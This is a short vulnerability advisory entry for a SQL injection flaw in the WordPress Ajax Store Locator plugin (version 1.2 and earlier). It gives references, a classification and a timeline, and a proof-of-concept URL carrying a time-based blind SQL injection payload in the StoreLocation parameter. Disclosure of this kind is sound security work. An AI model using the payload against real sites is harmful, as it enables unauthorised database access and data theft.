Ajax Store Locator <= 1.2 - Remote SQL Injection

Proof of Concept
http://www.example.com/wordpress/wp-admin/admin-ajax.php?action=sl_dal_searchlocation&funMethod=SearchStore&Location=Social&StoreLocation=1~1 AND (SELECT * FROM (SELECT(SLEEP(10)))LCKZ)

Affects Plugin

no known fix

References

ExploitDB: 36777
PacketStorm: 131464
URL: http://www.homelab.it/index.php/2015/04/15/wordpress-ajax-store-locator-sql-injection-vulnerability/

Classification

Type: SQLI
OWASP Top 10: A1: Injection
CWE: CWE-89

Miscellaneous

Submitter: pvdl
Views: 6603
Verified: No
WPVDB ID: 7907

Timeline

Publicly Published: 2015-04-15
Added: 2015-04-16
Last Updated: 2019-10-21